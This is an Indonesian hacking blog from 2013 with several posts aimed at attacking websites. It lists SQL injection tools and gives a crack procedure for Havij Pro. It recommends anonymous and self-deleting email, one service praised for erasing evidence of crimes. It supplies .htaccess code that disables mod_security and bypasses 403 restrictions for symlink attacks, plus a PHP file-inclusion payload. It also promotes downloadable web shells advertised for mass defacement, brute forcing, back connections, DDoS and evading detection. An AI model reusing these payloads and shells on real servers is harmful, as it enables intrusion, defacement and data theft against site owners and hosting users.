Kamis, 23 Mei 2013

Tools SQLi

1. BSQL Hacker
[Image: 01_bsql_full.jpg]
Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection yang di rancang untuk mengeksplor hampir seluruh jenis data base

[DOWNLOAD BSQL HACKER]

2. The Mole

[Image: 02_themole_full.png]
Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS / IDS yang menggunakan filter generik, mole dapat meng eksplor hanya dengan menggunak URL yang rentan dan string valid.

[DOWNLOAD THE MOLE]

3. Pangolin
[Image: 03_pangolin_full.png]
Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC, Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan user-friendly GUI dan support hampir untuk selur data base.

[DOWNLOAD PANGOLIN]

4. SQLMap

SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data base MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

[DOWNLOAD SQLMAP]

5. Havij
[Image: main2_0.png]
Tool ini sudah sangat terkenal di gunakan oleh para peretas di seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah 95 persen dan masih banyak lagi kelebihan havij.

[DOWNLOAD HAVIJ]

6. Enema SQLi
[Image: dbstructure.png]
Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis, enema bukanlah tool otomatis, enam tool yang di namis yang memang di rancang untuk profesional.

[DOWNLOAD ENEMA SQLI]

7. SQL Ninja
[Image: 07_sqlninja_full.JPG]
Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk targen server SQL, data base fingerprint, dan semu kemampuan untuk mengendalikan database yang rentan injek.

[DOWNLOAD SQL NINJA]

8. SQL Sus

Sql Sus merupakan tool open source antar mukanya berbasis perintah, anda dapat mengambil data base, mendownload file dari data base server dan masih banya lagi.

[DOWNLOAD SQL Sus]

9. Safe SQL Injector
[Image: 09_safe3_full.jpg]
Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan eksploitasi kelemahan SQL injection dan pengambilalihan database server.

[DOWNLOAD SAFE SQL INJECTOR]

10. SQL Poizon
Image has been scaled down 13% (806x437). Click this bar to view original image (924x500). Click image to open in new window.
[Image: scannert.png]

SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang telah terintegrasi di dalamnya.

[DOWNLOAD SQL POIZON]

Sumber : Devilzc0de
Diposting oleh di 1 komentar:

Kamis, 16 Mei 2013

Havij 1.17 Pro FULL Download


Cara crack
[1] Install Havij 1.17 Pro.exe
[2] ekstrak file loader.exe ke folder C:\Program Files\ITSecTeam\Havij Pro
[3] Jalankan Loader.exe (akses administrator diperlukan)
[4] ketika program sudah berjalan, klik “Register” tanpa perlu menigisi nama dan file registrasi.
Fitur update
Dump all.
New bypass method for MySQL using parenthesis.
Write file feature added for MSSQL and MySQL.
Loading HTML form inputs.
Saving data in CSV format.
Advanced evasion tab in the settings.
Injection tab in settings.
Non-existent injection value’ can now be changed by *user (the default value is 999999.9).
Comment mark’ can be changed by user (the default value is –).
Disabling/enabling of logging.
Bugfix: adding manual database in tables tree view.
Bugfix: finding string columns in PostgreSQL.
Bugfix: MS Access blind string type data extraction
Bugfix: MSSQL blind auto detection when error-based method fails
Bugfix: all database blind methods fail on retry
Bugfix: guessing columns/tables in MySQL time-based injection
Bugfix: crashing when dumping into file
Bugfix: loading project injection type (Integer or String)
Bugfix: HTTPS multi-threading bug
Bugfix: command execution in MSSQL 2005

Sumber = X-code
Diposting oleh di Tidak ada komentar:

Membuat Email Dengan Domain Unik


1.Mail.com

Ini layanan email gratis. Uniknya, kita bisa memilih domain kesukaan – akhiran email -dari sekitar 250 domain yang tersedia. Misalnya bila kau seorang wartawan buatlah alamat suratmu “namamu@journalist.com” atau untuk guru dengan alamat email “namamu@teacher.com”. Tetapi layanan ini memuat iklan-iklan banner dalam ukuran besar sehingga cukup mengganggu saat kita mengakses email.


2. Spamex.com

Situs layanan ini menciptakan alamat email yang tidak akan bisa dilihat oleh si penerima surat. Email dari orang tertentu bisa ditolak secara permanen sehingga tidak akan pernah masuk ke kotak inbox. Versi gratisnya berlaku selama 30 hari sebagai uji coba, dan setelah kedaluarsa kau bisa berlangganan dengan tarif sekitar Rp100 ribu untuk satu tahun.


3. BigString.com

Berbayar, dengan kapasitas sebesar 2 GB hingga 20 GB, tergantung jenis akun yang dipilih. Uniknya menarik kembali email yang terlanjur dikirim jadinya kalo email kita bernada kejahatan hemmmmm so pasti gak akan ada bukti lagi. Ketika si penerima membacanya maka email tersebut memberi tau kalo email yang agan kirim dibaca dan ketika habis dibaca oleh si penerima langsung kehapus sendiri, (Send Flash) kalo dalam istilah message hape.

4. HoaxMail.co.uk

Gratis, untuk mengirim email dan pesan SMS secara anonim. Bisa dipakai dari negara manapun.

5. MailExpire.com

( akun email sementara alias gak permanen alias bertahan Cuma 12 jam, bisa dibuat untuk ngerjain temen, gratis)

6. FutureMe.org

Fitur mengirim email yang sangat unik. Seperti namanya, kau bisa mengirim email detik ini untuk diterima oleh alamat tujuan pada waktu akan datang, sesuai jadwal yang kau setting.

7. Fuser.com

Dengan memakai Fuser, kau bisa sekaligus melihat semua emailmu yang terdaftar di layanan lain, seperti di Yahoo Mail, GMail, Hotmail, dll.

8. Postful.com

Layanan email berbayar. Tulis sebuah surat, lalu ketikkan alamat rumah/tempat tinggal si penerima, dan kirim ke layanan ini. Mereka akan mencetak suratmu dan menyampaikannya lewat jalur pos atau kurir.

9.yuurok.com

Layanan email yang dapat dengan cepat cara pembuatannya .


Diposting oleh di Tidak ada komentar:

Kamis, 02 Mei 2013

Bypass Symlink 403 (forbidden) Di litespeed

Code :

<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>


upload dengan nama .htaccess
Diposting oleh di 1 komentar:

Speciall Shell


Priv8 Shell
"404 NOT FOUND"




404 Not Found Shell is a PHP web shell which is password protected, whenever a normal user will try to access it, they get a 404 Not Found error
Password for the shell: aLLiGaToR

Get it Here: http://pastebin.com/5Uspqp94
Download: http://www.share.az/fa1nu62uo5vc/404.php.html




[NEW] Acid Shell v2 [~PRIV8]



This is the Acid Private Shell Version 2! NEW!

I created this shell and I sold it for a while but I have released it now because i'm currently making v3! so enjoy!

[ Features ]
- Mass Defacement Tool
- Safe Mode Bypass
- Open_Basedir Bypass
- Fixed SQL managed
- FTP Brute Force Tool
- Fully Undetected!

Get it Here: http://pastebin.com/rfRLTKuZ
Download: https://dl.dropbox.com/u/97541498/acidshell.php



SyRiAn Shell V7 - Priv8


--Features;
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
-- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDOS Attack

Get it Here: http://pastebin.com/KbPd7uiC
Download:
1.http://www.share.az/bdivmxwsn1ow/SyRiAn.Sh3ll.v7.php.html
2.http://packetstormsecurity.com/files/view/102849/syrian-shell.tgz
Diposting oleh di Tidak ada komentar:

Bypass 403 Forbidden

For 403 Forbidden Error i will be Using the Following Shells :

  • Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
  • Mannu Shell by Team Indishell Private !
  • Symlink_sa 3.0 Script
Download All Shell

Link Sudah di Perbaruhi
I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )
So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :
  • .htaccess 
<IfModule mod_security.c>SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
  • php.ini
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

  1. 403 Forbidden Error :
  2. Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .
  3. Mannu shell to Check if we Bypassed 403 Error :
  4. Bypassed 403 Forbidden and Access to Public_html/ Path
  5. Bypassed can't read /ect/named.conf and 403 forbidden Error
Sumber : editor From 3vil66.org and DC forum
Diposting oleh di Tidak ada komentar:

Bypass Symlink 403 Forbidden with .htaccess

Buka Notepad dan isikan code berikut :


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

save dengan nama .htaccess
upload di tempat sym yang udah tertanam di website. langsung lihat hasilnya :D
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)